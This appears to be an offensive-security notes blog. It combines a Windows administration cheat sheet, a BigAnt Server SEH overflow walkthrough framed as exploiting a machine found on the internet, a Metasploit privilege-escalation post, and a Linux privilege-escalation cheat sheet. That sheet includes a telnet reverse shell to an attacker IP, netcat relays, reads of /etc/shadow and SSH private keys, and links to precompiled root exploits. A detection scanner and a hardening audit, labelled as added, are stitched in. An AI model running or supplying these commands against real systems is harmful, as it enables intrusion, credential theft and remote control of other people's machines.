Remotely determine logged in user:
wmic /node:remotecomputer computersystem get username
List running processes:
wmic process list brief
Kill a process:
wmic process where name="cmd.exe" delete
Determine open shares:
net share
wmic share list brief
Determine IP address:
ipconfig
Get a new IP address:
ipconfig /release
ipconfig /renew
Remotely display machine’s MAC address:
wmic /node:machinename nic get macaddress
Remotely list running processes every second:
wmic /node:machinename process list brief /every:1
Remotely display System Info:
wmic /node:machinename computersystem list full
Disk drive information:
wmic diskdrive list full
wmic partition list full
Bios info:
wmic bios list full
List all patches:
wmic qfe
Look for a particular patch:
wmic qfe where hotfixid="KB958644" list full
Remotely List Local Enabled Accounts:
wmic /node:machinename USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name
Start a service remotely:
wmic /node:"machinename 4" service where name="lanmanserver" call startservice
sc \\machinename start lanmanserver
List services:
wmic service list brief
sc \\machinename query
Disable startup service:
sc config example disabled
List user accounts:
wmic useraccount list brief
Enable RDP remotely:
wmic /node:"machinename 4" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
List number of times a user logged on:
wmic netlogin where (name like "%adm%") get numberoflogons
Query active RDP sessions:
qwinsta /server:192.168.1.1
Remove active RDP session ID 2:
rwinsta /server:192.168.1.1 2
Remotely query registry for last logged in user:
reg query "\\computername\HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon" /v DefaultUserName
List all computers in domain “blah”:
dsquery computer "OU=example,DC=blah" -o rdn -limit 6000 > output.txt
Reboot:
shutdown /r /t 0
Shutdown:
shutdown /s /t 0
Remotely reboot machine:
shutdown /m \\192.168.1.1 /r /t 0 /f
Copy entire folder and its contents from a remote source to local machine:
xcopy /s \\remotecomputer\directory c:\local
Find location of file with string “blah” in file name:
dir c:\ /s /b | find "blah"
Spawn a new command prompt:
start cmd
Determine name of a machine with known IP:
nbtstat -A 192.168.1.1
Find directory named blah:
dir c:\ /s /b /ad | find "blah"
Command line history:
F7
Determine the current user (aka whoami Linux equivalent):
echo %USERNAME%
Determine who is a part of the administrators group:
net localgroup administrators
Add a user where bob is the username and password is blah:
net user bob blah /add
Add user bob to administrators group:
net localgroup administrators bob /add
List user accounts:
net user
Map a network share with a given drive letter of T:
net use T: \\serverNameOrIP\shareName
List network connections and the programs that are making those connections:
netstat -nba
Display contents of file text.txt:
type text.txt
Edit contents of file text.txt:
edit text.txt
Determine PC name:
hostname
Run cmd.exe as administrator user:
runas /user:administrator cmd
Uninstall a program, Symantec in this case ;-}:
wmic product where "description='Symantec'" call uninstall
Determine whether a system is 32 or 64 bit:
wmic cpu get DataWidth /format:list
Powershell one liner download file:
(new-object System.Net.WebClient).Downloadfile("http://example.com/file.txt", "C:\Users\bob\file.txt")
Information about OS version and other useful system information:
systeminfo
Startup applications:
wmic startup get caption,command
Recursively unzip all zip folders, you’ll need unzip.exe for this:
FOR /R %a IN (*.zip) DO unzip -d unzipDir "%a"
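The same list doubles as detection content. Every entry above is a legitimate administration command, so what a defender watches for is the remote or account-changing form turning up in process-creation telemetry from an account or host that does not normally run it. The following is an added example, not code from the original post: a small Python scanner that applies rules derived from the entries above (remote `wmic /node:`, `net user ... /add`, `net localgroup administrators ... /add`, `SetAllowTSConnections`, the `WebClient` `DownloadFile` one-liner, `shutdown /m`) to constructed process-creation log lines in an assumed `timestamp|host|user|command` format.

```python
"""Detection example (added; not from the original post): flag the remote-admin and
account-manipulation command forms from the cheat sheet in process-creation logs.

The input format "timestamp|host|user|command line" and the log lines themselves
are constructed for this example.
"""
import re

# (rule name, regex over the command line). Written against the exact command forms
# in the cheat sheet; tune them against your own telemetry before production use.
RULES = [
    ("remote_wmic", re.compile(r"\bwmic(\.exe)?\b.*\s/node:", re.I)),
    ("local_account_created",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+(\S+\s+)?/add\b", re.I)),
    ("added_to_administrators",
     re.compile(r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)),
    ("rdp_enabled_via_wmi", re.compile(r"SetAllowTSConnections", re.I)),
    ("powershell_download",
     re.compile(r"System\.Net\.WebClient.*DownloadFile", re.I)),
    ("remote_shutdown", re.compile(r"\bshutdown(\.exe)?\b.*\s/m\s+\\\\", re.I)),
]

# Constructed sample log: alice does routine local work, bob walks through the
# remote-admin and account-creation steps from the cheat sheet.
SAMPLE_LOG = r"""
2013-02-27T09:58:12|WS01|CORP\alice|ipconfig /all
2013-02-27T09:58:40|WS01|CORP\alice|wmic process list brief
2013-02-27T10:01:03|WS01|CORP\bob|wmic /node:FILESRV01 process list brief /every:1
2013-02-27T10:02:15|WS01|CORP\bob|net user backup Passw0rd! /add
2013-02-27T10:02:31|WS01|CORP\bob|net localgroup administrators backup /add
2013-02-27T10:03:02|WS01|CORP\bob|wmic /node:FILESRV01 path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"
2013-02-27T10:04:44|WS01|CORP\bob|powershell -c (new-object System.Net.WebClient).DownloadFile('http://example.com/file.txt','C:\Users\bob\file.txt')
2013-02-27T10:05:20|WS01|CORP\bob|shutdown /m \\FILESRV01 /r /t 0 /f
2013-02-27T10:06:00|WS01|CORP\alice|hostname
"""


def parse_line(line):
    """Split one constructed log line into its fields; return None if malformed."""
    parts = line.split("|", 3)
    if len(parts) != 4:
        return None
    ts, host, user, cmd = parts
    return {"ts": ts, "host": host, "user": user, "cmd": cmd}


def scan(lines):
    """Return (line_no, user, rule_name) for every rule matching a command line."""
    hits = []
    for no, line in enumerate(lines, start=1):
        rec = parse_line(line)
        if rec is None:
            continue
        for name, rx in RULES:
            if rx.search(rec["cmd"]):
                hits.append((no, rec["user"], name))
    return hits


def hits_by_user(hits):
    """Group the distinct rule names per account. Several distinct rules from one
    account in a short window is the create-account / add-to-admins / enable-RDP
    sequence the cheat sheet lays out, and is worth an alert on its own."""
    out = {}
    for _, user, name in hits:
        out.setdefault(user, set()).add(name)
    return {user: sorted(names) for user, names in out.items()}


def sample_lines():
    """The constructed sample log as a list of lines (blank leading line dropped)."""
    return SAMPLE_LOG.strip().splitlines()


if __name__ == "__main__":
    for no, user, name in scan(sample_lines()):
        print(f"line {no}: {user}: {name}")
    for user, names in hits_by_user(scan(sample_lines())).items():
        print(f"{user}: {len(names)} distinct rules -> {', '.join(names)}")
```

The rules key on the remote (`/node:`, `/m \\`) and mutating (`/add`, `call SetAllowTSConnections`) forms on purpose; the purely local read-only commands in the list (`ipconfig`, `wmic process list brief`, `hostname`) are left unflagged so the scanner stays quiet on ordinary administration.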
This blogspot is a compilation of notes, tutorials, and Offensive Security methods. Mainly I am using this for a 'quick reference' of my notes and training. I do not lay claim to these exploits, I am merely recreating them to gain a better understanding of security issues and techniques.
Wednesday, February 27, 2013
Saturday, February 9, 2013
Buffer Overflow SEH Overwrite part 3
BigAnt Server 2.52
First the attacker enumerates machines on the internet, using nmap etc. The attacker finds a machine running BigAnt Server 2.52. Second, after conducting more enumeration on the target machine, the attacker sets up a test machine to mirror our target machine. In this situation I have used a Windows XP machine, set up as a virtual machine. Third, in this case I will refer to our test machine as 'victim' with an IP address of 172.16.94.133; the attacking machine will be known as 'attacker' with an IP address of 172.16.94.173.
Attach debugger to running process "AntServer.exe"
Skeleton exploit to send to the "victim" machine
Send the skeleton exploit to the victim machine, and the debugger halts the execution flow of the program with an overwrite of the ESI register with A's, or as seen above in our skeleton exploit "\x41"
Still in the debugger go to view > seh chain. Notice our seh chain has been overwritten by all A's or "\x41" as well!
Go back to main window and select SHIFT + F9, and we pass the seh exception with an overwrite of EIP, again with all A's or "\x41"
On the attacker's machine we generate a 2500 byte generic string using metasploit.
Add the generic string we generated from metasploit to our skeleton exploit. Resend the rewritten skeleton exploit.
This time ESI gets overwritten with a value of 6Cb7
Again go to view > seh chain. seh value 42326742
Using the above two values, 6Cb7 and 42326742, we can use metasploit to determine our 'offsets.'
Rewrite the skeleton exploit to reflect the new information. Resend.
The debugger will halt the execution flow of the program, SHIFT+F9 will pass the exception and overwrite EIP with the four A's or "\x41" * 4 as predicted in the above script.
Using a Windows DLL to overwrite the structured exception handler. Go to C:\WINDOWS\system32 and copy vbajet32.dll to the metasploit DIR on the attacking machine. On the attacker machine run the command "msfpescan -i vbajet32.dll". Reference the DLLCharacteristics and note the output:
0x0000000. This means we can use this DLL to locate a SEH overwrite address.
In the main debugger window go to "E", between L and M, on the main task bar of Ollydbg.
Click on the "E" button and double click on "vbajet32.dll" now right click and choose "Search for" > "Sequence of Commands" a pop up box will appear. Type into the box:
POP r32
POP r32
RETN
Press "Find"
Copy the POP POP RETN values.
Set a "breakpoint" on the POP POP RETN address, by pressing SHIFT +F2.
Rewrite the skeleton exploit to reflect the new information found. Restart Ollydbg and set breakpoint on 0F9A196A. Resend skeleton exploit.
We hit our breakpoint. Press SHIFT +F9. Notice we need to jump another 6 bytes to our NOP's. To do this we will use "\x90\x90\x06\xEB", which gives us the additional 6 byte jump we need to hit our NOP sled and then down to our shellcode.
Rewrite the skeleton exploit to reflect our 6 byte jump to the NOP's, with shellcode.
Set up netcat listener on port 443 and resend skeleton exploit. Resend exploit with no Debugger attached to running process on victim machine.
A quick "ipconfig" on the victim machine to confirm exploitation.
Now we have a working exploit to send across the internet to exploit the machine originally found in our enumeration phase.
Wednesday, February 6, 2013
Fun backdooring Google-Chrome
*note: the backdooring technique will NOT be covered here!
After executing our exe file, Google-Chrome installs and is fully functional.
Attacking Machine:
Waiting on the attacking machine is a metasploit reverse listener on port 6666.
The ps command shows a list of running processes on the windows machine.
Notice the services are running as no-update\victim. This indicates I only have "user" privileges. We need to find a way to escalate our privs to "admin" status.
Using Metasploit's local privilege escalation exploit, which bypasses UAC controls and escalates our privs to "admin."
Set options.
Now we can add ourselves as "admin" users, enable remote desktop, enumerate passwords on the system etc....
rooting a linux server part 1
http://download.vulnhub.com/vulnimage/vulnimage.zip
Gaining www-data access on a Linux server, using SQL authentication bypass, tamper data, and a php webshell trick.
Tuesday, February 5, 2013
Linux Priv Escalation
Full credit goes to g0tmi1k!!
http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation.html
Operating System
What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
What's the Kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
What can be learnt from the environment variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Is there a printer?
lpstat -a
Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/services
Which service(s) are being run by root? Of these services, which are vulnerable? It's worth a double check!
ps aux | grep root
ps -ef | grep root
What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/
Are any of the service settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' 2>/dev/null
What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password' # Joomla
Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
What's cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21
Have you got a shell? Can you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Output (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!
Is port forwarding possible? Redirect and interact with traffic from another view
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch
# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay
mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)
Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig
Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything "interesting" in the home directory(ies)? If it's possible to access them
ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What has the user been doing? Is there any password in plain text? What have they been editing?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other
find /etc/ -readable -type f 2>/dev/null # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone
What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases
Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/
Is there anything in the log file(s) (Could help with "Local File Includes"!)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
If commands are limited, can you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
How are file-systems mounted?
mount
df -h
Are there any unmounted file-systems?
cat /etc/fstab
What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID
find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)
# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null
Where can be written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null # world-writeable folders
find / -perm -222 -type d 2>/dev/null # world-writeable folders
find / -perm -o+w -type d 2>/dev/null # world-writeable folders
find / -perm -o+x -type d 2>/dev/null # world-executable folders
find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writeable & executable folders
Any "problem" files? World-writeable, "nobody" files
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writeable directories without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files
Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc
How can files be uploaded?
find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp
Finding exploit code
http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com
Finding more information regarding the exploit
http://www.cvedetails.com
http://packetstormsecurity.org/files/cve/[CVE]
http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]
http://www.vulnview.com/cve-details.php?cvename=[CVE]
(Quick) "Common" exploits. Warning. Pre-compiled binary files. Use at your own risk
http://tarantula.by.ru/localroot/
http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/
Mitigations
Is any of the above information easy to find?
Try doing it!
Set up a cron job which automates script(s) and/or 3rd party products
Is the system fully patched? Kernel, operating system, all applications, their plugins and web services
apt-get update && apt-get upgrade
yum update
Are services running with the minimum level of privileges required?
For example, do you need to run MySQL as root?
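As an added example, not part of g0tmi1k's post or of this blog, here is the defender's side of the file-permission checks in the File Systems section and of the "set up a cron job which automates script(s)" advice above: a POSIX shell audit whose functions take their starting directory as a parameter (so they can be run against a scratch tree) and report world-writable files, world-writable directories without the sticky bit, SUID/SGID files not on an allow-list, orphaned files and processes running as root. The allow-list location /etc/setid.allow and the --report switch are assumptions of this example.

```sh
#!/bin/sh
# Added hardening audit (not from the original post): automates the file-permission
# checks from the list above so they can run from cron and report drift. Each check
# takes its starting directory as a parameter so it can be pointed at a scratch tree.

# World-writable regular files below a directory. Under /etc any hit is a
# misconfiguration: an unprivileged user can rewrite service configuration.
world_writable_files() {
    find "$1" -xdev -type f -perm -0002 2>/dev/null | sort
}

# World-writable directories that lack the sticky bit. Without the sticky bit any
# user can delete or rename other users' files placed there (the /tmp problem).
world_writable_dirs_no_sticky() {
    find "$1" -xdev -type d -perm -0002 ! -perm -1000 2>/dev/null | sort
}

# SUID/SGID files that are not on an allow-list (one absolute path per line).
# Build the allow-list from a known-good install; anything new is a finding.
unexpected_setid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null \
        | sort | grep -vxF -f "$2"
}

# Files with no owning user or group (left behind by deleted accounts or bad unpacks).
orphaned_files() {
    find "$1" -xdev \( -nouser -o -nogroup \) 2>/dev/null | sort
}

# Distinct process names running as root, for the "do you need to run MySQL
# as root?" question above.
root_processes() {
    ps -eo user= -o comm= | awk '$1 == "root" { print $2 }' | sort -u
}

# Report for the real system; suitable as a daily cron job whose output is mailed
# or appended to a log and diffed against the previous run.
audit_report() {
    allow=${1:-/etc/setid.allow}      # assumed allow-list location
    [ -r "$allow" ] || allow=/dev/null  # no allow-list: report every setid file
    printf '== world-writable files under /etc ==\n'
    world_writable_files /etc
    printf '== world-writable directories without sticky bit ==\n'
    world_writable_dirs_no_sticky /
    printf '== SUID/SGID files not on allow-list (%s) ==\n' "$allow"
    unexpected_setid_files / "$allow"
    printf '== files without owner or group ==\n'
    orphaned_files /
    printf '== processes running as root ==\n'
    root_processes
}

# Run the report only when asked, so the functions can also be sourced and reused.
if [ "${1:-}" = "--report" ]; then
    audit_report "${2:-}"
fi
```

Run it as `sh audit.sh --report` (optionally with the allow-list path as the second argument); from cron, redirect the output to a dated file and diff it against yesterday's so only changes reach the inbox.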
Scripts: Can any of this be automated?!
http://pentestmonkey.net/tools/unix-privesc-check/
http://labs.portcullis.co.uk/application/enum4linux/
http://bastille-linux.sourceforge.net
Other (quick) guides & Links
Enumeration
http://www.0daysecurity.com/penetration-testing/enumeration.html
http://www.microloft.co.uk/hacking/hacking3.htm
Misc
http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf
http://pentest.cryptocity.net/files/clientsides/post_exploitation_fall09.pdf
http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html